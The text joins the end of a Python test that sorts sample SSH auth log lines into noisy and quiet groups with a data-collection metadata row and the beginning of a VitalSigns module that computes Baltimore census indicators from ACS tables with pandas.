'Feb 20 21:54:44 localhost sshd[3402]: Accepted publickey for chuck from 10.0.2.2 port 63673 ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84',
'Feb 21 00:13:35 localhost sshd[7483]: Accepted password for sally from 192.168.33.1 port 58803 ssh2',
'Feb 21 08:35:22 localhost sshd[5774]: Failed password for root from 116.31.116.24 port 29160 ssh2',
'Feb 21 19:19:26 localhost sshd[16153]: Failed password for invalid user zuidberg from 142.0.45.14 port 52772 ssh2',
'Feb 21 21:56:12 localhost sshd[3430]: Invalid user test from 10.0.2.2',
'Line that does not match ip regex'
], 'foo')
def test_ports_default_to_common_ssh_ports(self):
self.assertEqual(self.tf_auth_log.ports, [{'port': 22, 'protocol': 'tcp'}])
def test_running_with_no_input_succeeds_but_tracks_no_log_lines(self):
self.tf_auth_log = TFAuthLog([], 'foo')
self.tf_auth_log.run()
self.assertEqual(self.tf_auth_log.noisy_logs, [])
self.assertEqual(self.tf_auth_log.quiet_logs, [])
def test_can_filter_noisy_and_quiet_lines(self):
with mock.patch.object(self.tf_auth_log, '_send_features', return_value={'ips': ['10.0.2.2',
'192.168.33.1',
'116.31.116.24',
'142.0.45.14',
'10.0.2.2']}):
self.tf_auth_log.run()
self.assertEqual(self.tf_auth_log.noisy_logs, [
{'timestamp': 1519202122, 'hostname': 'localhost', 'program': 'sshd', 'processid': '5774',
'message': 'Failed password for root from 116.31.116.24 port 29160 ssh2',
'raw': 'Feb 21 08:35:22 localhost sshd[5774]: Failed password for root from 116.31.116.24 port 29160 '
'ssh2'},
{'timestamp': 1519240766, 'hostname': 'localhost', 'program': 'sshd', 'processid': '16153',
'message': 'Failed password for invalid user zuidberg from 142.0.45.14 port 52772 ssh2',
'raw': 'Feb 21 19:19:26 localhost sshd[16153]: Failed password for invalid user zuidberg from '
'142.0.45.14 port 52772 ssh2'},
{'timestamp': 1519250172, 'hostname': 'localhost', 'program': 'sshd', 'processid': '3430',
'message': 'Invalid user test from 10.0.2.2',
'raw': 'Feb 21 21:56:12 localhost sshd[3430]: Invalid user test from 10.0.2.2'}]
)
self.assertEqual(self.tf_auth_log.quiet_logs, [
{'timestamp': 1519163684, 'hostname': 'localhost', 'program': 'sshd', 'processid': '3402',
'message': 'Accepted publickey for john from 199.2.2.2 port 63673 ssh2: '
'RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84',
'raw': 'Feb 20 21:54:44 localhost sshd[3402]: Accepted publickey for john from 199.2.2.2 port 63673 '
'ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84'},
{'timestamp': 1519172015, 'hostname': 'localhost', 'program': 'sshd', 'processid': '7483',
'message': 'Accepted password for kat from 201.1.33.12 port 58803 ssh2',
'raw': 'Feb 21 00:13:35 localhost sshd[7483]: Accepted password for kat from 201.1.33.12 port 58803 '
'ssh2'},
{'timestamp': 1519163684, 'hostname': 'localhost', 'program': 'sshd', 'processid': '3402',
'message': 'Accepted publickey for chuck from 10.0.2.2 port 63673 ssh2: '
'RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84',
'raw': 'Feb 20 21:54:44 localhost sshd[3402]: Accepted publickey for chuck from 10.0.2.2 port 63673 '
'ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84'},
{'timestamp': 1519172015, 'hostname': 'localhost', 'program': 'sshd', 'processid': '7483',
'message': 'Accepted password for sally from 192.168.33.1 port 58803 ssh2',
'raw': 'Feb 21 00:13:35 localhost sshd[7483]: Accepted password for sally from 192.168.33.1 port 58803'
' ssh2'},
{'raw': 'Line that does not match ip regex'}])
| 69.680556 | 164 | 0.556707 | 694 | 5,017 | 3.951009 | 0.191643 | 0.066375 | 0.036105 | 0.047411 | 0.834792 | 0.792487 | 0.763311 | 0.743618 | 0.707877 | 0.707877 | 0 | 0.202601 | 0.310345 | 5,017 | 71 | 165 | 70.661972 | 0.589884 | 0 | 0 | 0.209677 | 0 | 0.274194 | 0.524018 | 0.056209 | 0 | 0 | 0 | 0 | 0.080645 | 1 | 0.064516 | false | 0.193548 | 0.048387 | 0 | 0.129032 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
ec86a6df98021458539df0441c96f5508a8d9933 | 149,575 | py | Python | VitalSigns/indicators.py | BNIA/VitalSigns | 1c06284a7423fb837890b5d4b42567e8f14bf278 | [
"Apache-2.0"
] | 1 | 2022-02-03T21:21:39.000Z | 2022-02-03T21:21:39.000Z | VitalSigns/indicators.py | BNIA/VitalSigns | 1c06284a7423fb837890b5d4b42567e8f14bf278 | [
"Apache-2.0"
] | null | null | null | VitalSigns/indicators.py | BNIA/VitalSigns | 1c06284a7423fb837890b5d4b42567e8f14bf278 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: notebooks/04_Create_Acs_Indicators_Original.ipynb (unless otherwise specified).
__all__ = ['racdiv', 'pasi', 'elheat', 'empl', 'fam', 'female', 'femhhs', 'heatgas', 'hh40inc', 'hh60inc', 'hh75inc',
'hhchpov', 'hhm75', 'hhpov', 'hhs', 'hsdipl', 'lesshs', 'male', 'nilf', 'othrcom', 'p2more', 'pubtran',
'age5', 'age24', 'age64', 'age18', 'age65', 'affordm', 'affordr', 'bahigher', 'carpool', 'drvalone',
'hh25inc', 'mhhi', 'nohhint', 'novhcl', 'paa', 'ppac', 'phisp', 'pwhite', 'sclemp', 'tpop', 'trav14',
'trav29', 'trav45', 'trav44', 'unempl', 'unempr', 'walked']
# Cell
#File: racdiv.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B02001 - Race
# Universe: Total Population
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def racdiv( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B02001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df_hisp = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
df_hisp = df_hisp.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
df_hisp = df_hisp.sum(numeric_only=True)
# Append the one column from the other ACS Table
df['B03002_012E_Total_Hispanic_or_Latino'] = df_hisp['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['African-American%'] = df[ 'B02001_003E_Total_Black_or_African_American_alone' ] / df[ 'B02001_001E_Total' ] * 100
df1['White%'] = df[ 'B02001_002E_Total_White_alone' ] / df[ 'B02001_001E_Total' ] * 100
df1['American Indian%'] = df[ 'B02001_004E_Total_American_Indian_and_Alaska_Native_alone' ]/ df[ 'B02001_001E_Total' ] * 100
df1['Asian%'] = df[ 'B02001_005E_Total_Asian_alone' ] / df[ 'B02001_001E_Total' ] * 100
df1['Native Hawaii/Pac Islander%'] = df[ 'B02001_006E_Total_Native_Hawaiian_and_Other_Pacific_Islander_alone'] / df[ 'B02001_001E_Total' ] * 100
df1['Hisp %'] = df['B03002_012E_Total_Hispanic_or_Latino'] / df[ 'B02001_001E_Total' ] * 100
# =1-(POWER(%AA/100,2)+POWER(%White/100,2)+POWER(%AmerInd/100,2)+POWER(%Asian/100,2) + POWER(%NativeAm/100,2))*(POWER(%Hispanci/100,2) + POWER(1-(%Hispanic/100),2))
df1['Diversity_index'] = ( 1- (
( df1['African-American%'] /100 )**2
+( df1['White%'] /100 )**2
+( df1['American Indian%'] /100 )**2
+( df1['Asian%'] /100 )**2
+( df1['Native Hawaii/Pac Islander%'] /100 )**2
)*(
( df1['Hisp %'] /100 )**2
+(1-( df1['Hisp %'] /100) )**2
) ) * 100
return df1['Diversity_index']
# Cell
#File: pasi.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def pasi( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Append the one column from the other ACS Table
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['Asian%NH'] = df[ 'B03002_006E_Total_Not_Hispanic_or_Latino_Asian_alone' ]/ tot * 100
return df1['Asian%NH']
# Cell
#File: elheat.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B25040 - HOUSE HEATING FUEL
# Universe - Occupied housing units
# Table Creates: elheat, heatgas
#purpose: Produce Sustainability - Percent of Residences Heated by Electricity Indicator
#input: Year
#output:
import pandas as pd
import glob
def elheat( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B25040*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B25040_004E','B25040_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B25040_004E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B25040_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation + final mods
# ( value[1] / nullif(value[2],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <elheat_14> */ --
WITH tbl AS (
select csa,
( value[1] / nullif(value[2],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25040_004E','B25040_001E'])
)
update vital_signs.data
set elheat = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: empl.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B23001 - SEX BY AGE BY EMPLOYMENT STATUS FOR THE POPULATION 16 YEARS AND OVER
# Universe - Population 16 years and over
# Table Creates: empl, unempl, unempr, nilf
#purpose: Produce Workforce and Economic Development - Percent Population 16-64 Employed Indicator
#input: Year
#output:
import pandas as pd
import glob
def empl( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B23001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E', 'B23001_007E', 'B23001_014E', 'B23001_021E', 'B23001_028E', 'B23001_035E', 'B23001_042E', 'B23001_049E', 'B23001_056E', 'B23001_063E', 'B23001_070E', 'B23001_093E', 'B23001_100E', 'B23001_107E', 'B23001_114E', 'B23001_121E', 'B23001_128E', 'B23001_135E', 'B23001_142E', 'B23001_149E', 'B23001_156E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B23001_007E', 'B23001_014E', 'B23001_021E', 'B23001_028E', 'B23001_035E', 'B23001_042E', 'B23001_049E', 'B23001_056E', 'B23001_063E', 'B23001_070E', 'B23001_093E', 'B23001_100E', 'B23001_107E', 'B23001_114E', 'B23001_121E', 'B23001_128E', 'B23001_135E', 'B23001_142E', 'B23001_149E', 'B23001_156E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# (value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force empl 16-64
#/
#nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <empl_14> */ --
WITH tbl AS (
select csa,
( ( value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force empl 16-64 / nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100::numeric
as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY[ 'B23001_003E','B23001_010E','B23001_017E','B23001_024E','B23001_031E','B23001_038E','B23001_045E','B23001_052E','B23001_059E','B23001_066E','B23001_089E','B23001_096E','B23001_103E','B23001_110E','B23001_117E','B23001_124E','B23001_131E','B23001_138E','B23001_145E','B23001_152E','B23001_007E','B23001_014E','B23001_021E','B23001_028E','B23001_035E','B23001_042E','B23001_049E','B23001_056E','B23001_063E','B23001_070E','B23001_093E','B23001_100E','B23001_107E','B23001_114E','B23001_121E','B23001_128E','B23001_135E','B23001_142E','B23001_149E','B23001_156E'])
)
update vital_signs.data
set empl = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: fam.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B11005 - HOUSEHOLDS BY PRESENCE OF PEOPLE UNDER 18 YEARS BY HOUSEHOLD TYPE
# Universe: Households
# Table Creates: hhs, fam, femhhs
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def fam( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B11005*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
# DIFFERENCES IN TABLE NAMES EXIST BETWEEN 16 and 17. 17 has no comma.
rootStr = 'B11005_007E_Total_Households_with_one_or_more_people_under_18_years_Family_households_Other_family_Female_householder'
str16 = rootStr + ',_no_husband_present'
str17 = rootStr + '_no_husband_present'
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Delete Unassigned--Jail
df = df[df.index != 'Unassigned--Jail']
# Move Baltimore to Bottom
bc = df.loc[ 'Baltimore City' ]
df = df.drop( df.index[1] )
df.loc[ 'Baltimore City' ] = bc
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
# Actually produce the data
df1['total'] = df[ 'B11005_001E_Total' ]
df1['18Under'] = df[ 'B11005_002E_Total_Households_with_one_or_more_people_under_18_years' ] / df1['total'] * 100
return df1['18Under']
# Cell
#File: female.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def female( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['onlyTheLadies'] = df[ 'B01001_026E_Total_Female' ]
return df1['onlyTheLadies']
# Cell
#File: femhhs.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B11005 - HOUSEHOLDS BY PRESENCE OF PEOPLE UNDER 18 YEARS BY HOUSEHOLD TYPE
# Universe: Households
# Table Creates: male, hhs, fam, femhhs
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def femhhs( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B11005*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
# DIFFERENCES IN TABLE NAMES EXIST BETWEEN 16 and 17. 17 has no comma.
rootStr = 'B11005_007E_Total_Households_with_one_or_more_people_under_18_years_Family_households_Other_family_Female_householder'
str16 = rootStr + ',_no_husband_present'
str17 = rootStr + '_no_husband_present'
str19 = rootStr + ',_no_spouse_present'
femhh = str17 if year == '17' else str19 if year == '19' else str16
# Actually produce the data
df1['total'] = df[ 'B11005_001E_Total' ]
df1['18Under'] = df[ 'B11005_002E_Total_Households_with_one_or_more_people_under_18_years' ] / df1['total'] * 100
df1['FemaleHH'] = df[ femhh ] / df['B11005_002E_Total_Households_with_one_or_more_people_under_18_years'] * 100
df1['FamHHChildrenUnder18'] = df['B11005_003E_Total_Households_with_one_or_more_people_under_18_years_Family_households']
df1['FamHHChildrenOver18'] = df['B11005_012E_Total_Households_with_no_people_under_18_years_Family_households']
df1['FamHH'] = df1['FamHHChildrenOver18'] + df1['FamHHChildrenUnder18']
return df1['FemaleHH']
# Cell
#File: heatgas.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B25040 - HOUSE HEATING FUEL
# Universe - Occupied housing units
# Table Creates: elheat, heatgas
#purpose: Produce Sustainability - Percent of Residences Heated by Electricity Indicator
#input: Year
#output:
import pandas as pd
import glob
def heatgas( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B25040*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B25040_002E','B25040_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B25040_002E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B25040_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( value[1] / nullif(value[2],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <heatgas_14> */ --
WITH tbl AS (
select csa,
( value[1] / nullif(value[2],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25040_002E','B25040_001E'])
)
update vital_signs.data
set heatgas = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: hh40inc.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household Income 25K-40K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hh40inc( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# val1.__class__.__name__
#
# create a new dataframe for giggles
fi = pd.DataFrame()
# append into that dataframe col 001
key = getColName(df, '001')
val = getColByName(df, '001')
fi[key] = val
# append into that dataframe col 006
key = getColName(df, '006')
val = getColByName(df, '006')
fi[key] = val
# append into that dataframe col 007
key = getColName(df, '007')
val = getColByName(df, '007')
fi[key] = val
# append into that dataframe col 008
key = getColName(df, '008')
val = getColByName(df, '008')
fi[key] = val
# Delete Rows where the 'denominator' column is 0 -> like the Jail
fi = fi[fi[fi.columns[0]] != 0]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
return fi.apply(lambda x: ( ( x[fi.columns[1] ]+ x[fi.columns[2] ]+ x[fi.columns[3] ] ) / x[fi.columns[0]])*100, axis=1)
"""
/* hh40inc */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3]) / value[4] )*100 as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B19001_006E','B19001_007E','B19001_008E','B19001_001E'])
)
UPDATE vital_signs.data
set hh40inc = result from tbl where data.csa = tbl.csa and data_year = '2013';
"""
# Cell
#File: hh60inc.py
#Author: Charles Karpati
